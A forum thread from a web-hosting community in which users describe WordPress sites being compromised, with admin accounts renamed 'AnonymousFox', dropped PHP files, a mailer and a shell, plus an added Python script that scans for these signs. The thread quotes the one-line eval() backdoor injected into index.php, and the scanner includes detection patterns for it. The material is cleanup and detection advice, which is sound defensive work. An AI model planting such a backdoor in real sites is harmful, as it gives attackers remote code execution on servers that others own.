
[Solved] Invalid Login


hdkw1996


Hi,

The same thing started happening to me yesterday. I have a WordPress site on Tommy and I couldn't log in to either cPanel or the WordPress administration.

After resetting my password, I could log in to cPanel. I checked the WordPress database and discovered that the admin user login had been renamed and the password changed. These changes were not made by me, so I think the site has been hacked (and so has my cPanel account).

I thought this was only my problem, but a family member who has a WordPress blog on HelioHost too suffered the same problem. The WordPress admin user was renamed to the same login as mine and access to cPanel was not possible. Then we had to reset the cPanel password to fix it.

Seemingly the attack only affects the passwords, not the files, and the database is in a good state. Anyway, I plan to restore a full backup of the site to ensure that everything is good.

Does anyone have the same problem?

Best Regards,


Same problem here. I tried to open cPanel, no luck.
I know the password was correct so I didn't reset it.
A few minutes later, I couldn't even try to log in, and none of my websites would load; the problem was the server blocking my IP for too many attempts.

Now I have reset the cPanel password, and I can't log in to WP. They also reset the WordPress login; the username was changed to "AnonymousFox".

What a shame. You have a shop and they can reset the PayPal account to get the payments, and download all your clients' data.

So what if you reset it back? They can still make it happen again if the bug is not patched.

Edited by dream11

Yes, 'AnonymousFox' was the same administrator user rename as mine.

I have installed Wordfence on my WordPress site. Thanks to the plugin I found out that a suspicious administrator login was made.

I have done a scan with Wordfence, and the WordPress installation has been modified:

New file: wp-admin/2125719357.php

New file: wp-content/1205929475.php

New file: wp-admin/php.ini

Modified file: index.php


And what are the changes made to php.ini and index.php?

I can delete the other files, but I don't know what changes were made to the ini and php.

Of the other two new files, one is a password-protected PHP mailer,
and the other one is an encrypted shell access.

This has clearly been made for phishing.


Edited by dream11

In "index.php", remove this code at the start of the file:

<?php eval($_POST['475454656']); ?>

The "php.ini" must be deleted because it does not belong to WordPress.

I think these are the only changes that were made, but the best solution is to restore a recent full backup of the site (files and database) if you have one.

Also, this doesn't prevent the hack from happening again in the future, because it's necessary to know where the security hole is...

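Added example, not part of any post in this thread: a Python script that checks a WordPress directory for the three indicators reported above (numeric-named PHP files, a php.ini under wp-admin, and eval() called directly on request input). The function names, the constructed sample tree and the extra superglobals in the regex are assumptions made for illustration.

```python
import re
import tempfile
from pathlib import Path

# eval() fed directly from request data, as in the index.php line quoted above.
# Also matching $_GET/$_REQUEST/$_COOKIE is an assumption beyond the thread.
EVAL_INPUT = re.compile(rb"eval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b")
NUMERIC_PHP = re.compile(r"^\d+\.php$")  # e.g. wp-admin/2125719357.php


def scan_wordpress(root):
    """Return sorted (relative_path, reason) pairs for the thread's indicators."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if NUMERIC_PHP.match(path.name):
            findings.append((rel, "numeric-named PHP file"))
        if path.name == "php.ini" and rel.startswith("wp-admin/"):
            findings.append((rel, "php.ini inside wp-admin"))
        if path.suffix == ".php" and EVAL_INPUT.search(path.read_bytes()):
            findings.append((rel, "eval() on request input"))
    return sorted(findings)


def build_sample_tree(base):
    """Constructed sample site mirroring the Wordfence report in the thread."""
    files = {
        "index.php": "<?php eval($_POST['475454656']); ?>\n<?php /* rest of file */\n",
        "wp-admin/2125719357.php": "<?php /* placeholder, not real malware */\n",
        "wp-content/1205929475.php": "<?php /* placeholder, not real malware */\n",
        "wp-admin/php.ini": "; placeholder\n",
        "wp-admin/admin.php": "<?php /* ordinary core file stand-in */\n",
    }
    for rel, body in files.items():
        target = Path(base) / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body)
    return base


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for rel, reason in scan_wordpress(build_sample_tree(tmp)):
            print(f"{rel}: {reason}")
```

A clean result from these three checks does not show the site is clean; it only covers the changes listed in this thread.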

Thanks.

To you, does it look like a WordPress hack or a server hack?

The fact they changed the cPanel scared me a bit, since they have access to do anything.


WordPress is well known for severe security issues and is laughably easy to compromise, especially because it's usually not kept updated, and because its extensions are usually also full of holes.

We recommend not using WP for these and many other reasons. It's a leading cause of hacked sites, high load suspensions, spam suspensions, and phishing bans here at HelioHost. Finding another CMS is your best option.

If you really want to keep WP, delete your installation, reinstall using updated components, don't use dubious themes and extensions from random websites (many are actually disguised backdoors) and make sure you keep it updated going forward. Otherwise this issue is just going to come back.

Also, that leafmailer is a spambot (we usually ban accounts that have it, please get rid of that ASAP or you'll lose your account).


unblock ip please - https://www.helionet.org/index/topic/33546-unblock-ip/

This topic is now closed to further replies.